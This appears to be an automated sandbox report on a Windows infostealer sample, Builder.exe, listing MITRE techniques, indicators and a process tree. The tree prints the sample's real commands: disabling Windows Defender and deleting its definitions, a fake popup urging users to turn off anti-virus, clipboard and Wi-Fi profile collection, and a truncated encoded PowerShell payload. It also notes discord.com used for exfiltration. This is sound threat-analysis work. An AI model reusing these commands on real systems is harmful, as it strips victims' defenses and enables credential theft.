7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184

Analysis

max time kernel
31s
max time network
33s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250128-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
30-01-2025 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Builder.exe
Size

7.3MB
MD5

a215edd9d9788492b561858e44184bca
SHA1

77d8816ecce79f525c118687149e2f3b68dcb984
SHA256

7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184
SHA512

64dfdf28e74a95af3cef3ad89b45d656bb49fba705665aad7878a397f18ae1c1a7e1aca2df466e80179f130b5350f0ac1eea26affe940742c2c42b8930f035ff
SSDEEP

196608:uuWYS6uOshoKMuIkhVastRL5Di3uq1D7mW:IYShOshouIkPftRL54DRX

Score

10^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

defense_evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3276	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
404	powershell.exe
2668	powershell.exe
1108	powershell.exe
5028	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2772	powershell.exe
4588	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2560	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe
4160	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	discord.com
14	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com
11	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2648	tasklist.exe
968	tasklist.exe
5036	tasklist.exe
2840	tasklist.exe
3776	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4520	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000027de4-21.dat	upx
behavioral1/memory/4160-25-0x00007FF95C280000-0x00007FF95C869000-memory.dmp	upx
behavioral1/files/0x0007000000027dd7-27.dat	upx
behavioral1/memory/4160-30-0x00007FF970640000-0x00007FF970663000-memory.dmp	upx
behavioral1/memory/4160-48-0x00007FF972A60000-0x00007FF972A6F000-memory.dmp	upx
behavioral1/files/0x0007000000027dde-47.dat	upx
behavioral1/files/0x0007000000027ddd-46.dat	upx
behavioral1/files/0x0007000000027ddc-45.dat	upx
behavioral1/files/0x0007000000027ddb-44.dat	upx
behavioral1/files/0x0007000000027dda-43.dat	upx
behavioral1/files/0x0007000000027dd9-42.dat	upx
behavioral1/files/0x0007000000027dd8-41.dat	upx
behavioral1/files/0x0008000000027dd6-40.dat	upx
behavioral1/files/0x0007000000027de9-39.dat	upx
behavioral1/files/0x0007000000027de8-38.dat	upx
behavioral1/files/0x0007000000027de7-37.dat	upx
behavioral1/files/0x0007000000027de3-34.dat	upx
behavioral1/files/0x0007000000027de1-33.dat	upx
behavioral1/files/0x0007000000027de2-29.dat	upx
behavioral1/memory/4160-54-0x00007FF96D350000-0x00007FF96D37D000-memory.dmp	upx
behavioral1/memory/4160-56-0x00007FF96D760000-0x00007FF96D779000-memory.dmp	upx
behavioral1/memory/4160-58-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp	upx
behavioral1/memory/4160-60-0x00007FF95C100000-0x00007FF95C277000-memory.dmp	upx
behavioral1/memory/4160-62-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp	upx
behavioral1/memory/4160-64-0x00007FF972A50000-0x00007FF972A5D000-memory.dmp	upx
behavioral1/memory/4160-66-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp	upx
behavioral1/memory/4160-69-0x00007FF95C280000-0x00007FF95C869000-memory.dmp	upx
behavioral1/memory/4160-72-0x00007FF970640000-0x00007FF970663000-memory.dmp	upx
behavioral1/memory/4160-71-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp	upx
behavioral1/memory/4160-70-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp	upx
behavioral1/memory/4160-74-0x00007FF96AEB0000-0x00007FF96AEC4000-memory.dmp	upx
behavioral1/memory/4160-76-0x00007FF970610000-0x00007FF97061D000-memory.dmp	upx
behavioral1/memory/4160-78-0x00007FF96D760000-0x00007FF96D779000-memory.dmp	upx
behavioral1/memory/4160-79-0x00007FF95B7D0000-0x00007FF95B8EC000-memory.dmp	upx
behavioral1/memory/4160-100-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp	upx
behavioral1/memory/4160-107-0x00007FF95C100000-0x00007FF95C277000-memory.dmp	upx
behavioral1/memory/4160-184-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp	upx
behavioral1/memory/4160-261-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp	upx
behavioral1/memory/4160-272-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp	upx
behavioral1/memory/4160-273-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp	upx
behavioral1/memory/4160-282-0x00007FF95C280000-0x00007FF95C869000-memory.dmp	upx
behavioral1/memory/4160-288-0x00007FF95C100000-0x00007FF95C277000-memory.dmp	upx
behavioral1/memory/4160-283-0x00007FF970640000-0x00007FF970663000-memory.dmp	upx
behavioral1/memory/4160-318-0x00007FF970640000-0x00007FF970663000-memory.dmp	upx
behavioral1/memory/4160-331-0x00007FF95B7D0000-0x00007FF95B8EC000-memory.dmp	upx
behavioral1/memory/4160-330-0x00007FF970610000-0x00007FF97061D000-memory.dmp	upx
behavioral1/memory/4160-329-0x00007FF96AEB0000-0x00007FF96AEC4000-memory.dmp	upx
behavioral1/memory/4160-327-0x00007FF95BBE0000-0x00007FF95C100000-memory.dmp	upx
behavioral1/memory/4160-326-0x00007FF96A9C0000-0x00007FF96A9F3000-memory.dmp	upx
behavioral1/memory/4160-325-0x00007FF972A50000-0x00007FF972A5D000-memory.dmp	upx
behavioral1/memory/4160-324-0x00007FF96C5B0000-0x00007FF96C5C9000-memory.dmp	upx
behavioral1/memory/4160-323-0x00007FF95C100000-0x00007FF95C277000-memory.dmp	upx
behavioral1/memory/4160-322-0x00007FF96AC00000-0x00007FF96AC23000-memory.dmp	upx
behavioral1/memory/4160-321-0x00007FF96D760000-0x00007FF96D779000-memory.dmp	upx
behavioral1/memory/4160-320-0x00007FF96D350000-0x00007FF96D37D000-memory.dmp	upx
behavioral1/memory/4160-319-0x00007FF972A60000-0x00007FF972A6F000-memory.dmp	upx
behavioral1/memory/4160-317-0x00007FF95C280000-0x00007FF95C869000-memory.dmp	upx
behavioral1/memory/4160-328-0x00007FF95BB10000-0x00007FF95BBDD000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
416	cmd.exe
956	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2944	cmd.exe
1244	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1884	WMIC.exe
1144	WMIC.exe
3076	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4732	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
956	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
2332	WMIC.exe
2332	WMIC.exe
2332	WMIC.exe
2332	WMIC.exe
5028	powershell.exe
404	powershell.exe
404	powershell.exe
5028	powershell.exe
1884	WMIC.exe
1884	WMIC.exe
1884	WMIC.exe
1884	WMIC.exe
1144	WMIC.exe
1144	WMIC.exe
1144	WMIC.exe
1144	WMIC.exe
2984	WMIC.exe
2984	WMIC.exe
2984	WMIC.exe
2984	WMIC.exe
2772	powershell.exe
2772	powershell.exe
2772	powershell.exe
3628	powershell.exe
3628	powershell.exe
3628	powershell.exe
2668	powershell.exe
2668	powershell.exe
1084	powershell.exe
1084	powershell.exe
2756	WMIC.exe
2756	WMIC.exe
2756	WMIC.exe
2756	WMIC.exe
2404	WMIC.exe
2404	WMIC.exe
2404	WMIC.exe
2404	WMIC.exe
1020	WMIC.exe
1020	WMIC.exe
1020	WMIC.exe
1020	WMIC.exe
1108	powershell.exe
1108	powershell.exe
3076	WMIC.exe
3076	WMIC.exe
3076	WMIC.exe
3076	WMIC.exe
4612	powershell.exe
4612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	968	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe
Token: SeUndockPrivilege	2332	WMIC.exe
Token: SeManageVolumePrivilege	2332	WMIC.exe
Token: 33	2332	WMIC.exe
Token: 34	2332	WMIC.exe
Token: 35	2332	WMIC.exe
Token: 36	2332	WMIC.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe
Token: SeUndockPrivilege	2332	WMIC.exe
Token: SeManageVolumePrivilege	2332	WMIC.exe
Token: 33	2332	WMIC.exe
Token: 34	2332	WMIC.exe
Token: 35	2332	WMIC.exe
Token: 36	2332	WMIC.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeIncreaseQuotaPrivilege	5028	powershell.exe
Token: SeSecurityPrivilege	5028	powershell.exe
Token: SeTakeOwnershipPrivilege	5028	powershell.exe
Token: SeLoadDriverPrivilege	5028	powershell.exe
Token: SeSystemProfilePrivilege	5028	powershell.exe
Token: SeSystemtimePrivilege	5028	powershell.exe
Token: SeProfSingleProcessPrivilege	5028	powershell.exe
Token: SeIncBasePriorityPrivilege	5028	powershell.exe
Token: SeCreatePagefilePrivilege	5028	powershell.exe
Token: SeBackupPrivilege	5028	powershell.exe
Token: SeRestorePrivilege	5028	powershell.exe
Token: SeShutdownPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeSystemEnvironmentPrivilege	5028	powershell.exe
Token: SeRemoteShutdownPrivilege	5028	powershell.exe
Token: SeUndockPrivilege	5028	powershell.exe
Token: SeManageVolumePrivilege	5028	powershell.exe
Token: 33	5028	powershell.exe
Token: 34	5028	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3132 wrote to memory of 4160	3132	Builder.exe	81
PID 3132 wrote to memory of 4160	3132	Builder.exe	81
PID 4160 wrote to memory of 2160	4160	Builder.exe	83
PID 4160 wrote to memory of 2160	4160	Builder.exe	83
PID 4160 wrote to memory of 644	4160	Builder.exe	84
PID 4160 wrote to memory of 644	4160	Builder.exe	84
PID 4160 wrote to memory of 4268	4160	Builder.exe	85
PID 4160 wrote to memory of 4268	4160	Builder.exe	85
PID 4160 wrote to memory of 2472	4160	Builder.exe	87
PID 4160 wrote to memory of 2472	4160	Builder.exe	87
PID 4160 wrote to memory of 3224	4160	Builder.exe	91
PID 4160 wrote to memory of 3224	4160	Builder.exe	91
PID 4268 wrote to memory of 1532	4268	cmd.exe	93
PID 4268 wrote to memory of 1532	4268	cmd.exe	93
PID 2472 wrote to memory of 968	2472	cmd.exe	94
PID 2472 wrote to memory of 968	2472	cmd.exe	94
PID 3224 wrote to memory of 2332	3224	cmd.exe	95
PID 3224 wrote to memory of 2332	3224	cmd.exe	95
PID 644 wrote to memory of 404	644	cmd.exe	96
PID 644 wrote to memory of 404	644	cmd.exe	96
PID 2160 wrote to memory of 5028	2160	cmd.exe	97
PID 2160 wrote to memory of 5028	2160	cmd.exe	97
PID 4160 wrote to memory of 3528	4160	Builder.exe	100
PID 4160 wrote to memory of 3528	4160	Builder.exe	100
PID 3528 wrote to memory of 4840	3528	cmd.exe	102
PID 3528 wrote to memory of 4840	3528	cmd.exe	102
PID 4160 wrote to memory of 4756	4160	Builder.exe	103
PID 4160 wrote to memory of 4756	4160	Builder.exe	103
PID 4756 wrote to memory of 3216	4756	cmd.exe	105
PID 4756 wrote to memory of 3216	4756	cmd.exe	105
PID 4160 wrote to memory of 460	4160	Builder.exe	106
PID 4160 wrote to memory of 460	4160	Builder.exe	106
PID 460 wrote to memory of 1884	460	cmd.exe	108
PID 460 wrote to memory of 1884	460	cmd.exe	108
PID 4160 wrote to memory of 1488	4160	Builder.exe	109
PID 4160 wrote to memory of 1488	4160	Builder.exe	109
PID 1488 wrote to memory of 1144	1488	cmd.exe	111
PID 1488 wrote to memory of 1144	1488	cmd.exe	111
PID 4160 wrote to memory of 4520	4160	Builder.exe	113
PID 4160 wrote to memory of 4520	4160	Builder.exe	113
PID 644 wrote to memory of 3276	644	cmd.exe	112
PID 644 wrote to memory of 3276	644	cmd.exe	112
PID 4520 wrote to memory of 4092	4520	cmd.exe	157
PID 4520 wrote to memory of 4092	4520	cmd.exe	157
PID 4160 wrote to memory of 1108	4160	Builder.exe	116
PID 4160 wrote to memory of 1108	4160	Builder.exe	116
PID 4160 wrote to memory of 880	4160	Builder.exe	117
PID 4160 wrote to memory of 880	4160	Builder.exe	117
PID 1108 wrote to memory of 5036	1108	cmd.exe	120
PID 1108 wrote to memory of 5036	1108	cmd.exe	120
PID 880 wrote to memory of 2840	880	cmd.exe	121
PID 880 wrote to memory of 2840	880	cmd.exe	121
PID 4160 wrote to memory of 2032	4160	Builder.exe	122
PID 4160 wrote to memory of 2032	4160	Builder.exe	122
PID 4160 wrote to memory of 4588	4160	Builder.exe	123
PID 4160 wrote to memory of 4588	4160	Builder.exe	123
PID 4160 wrote to memory of 1680	4160	Builder.exe	126
PID 4160 wrote to memory of 1680	4160	Builder.exe	126
PID 2032 wrote to memory of 2984	2032	cmd.exe	128
PID 2032 wrote to memory of 2984	2032	cmd.exe	128
PID 4588 wrote to memory of 2772	4588	cmd.exe	129
PID 4588 wrote to memory of 2772	4588	cmd.exe	129
PID 1680 wrote to memory of 3776	1680	cmd.exe	130
PID 1680 wrote to memory of 3776	1680	cmd.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2356	attrib.exe
4092	attrib.exe
3512	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Users\Admin\AppData\Local\Temp\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1844
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2944
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3368
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1612
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAG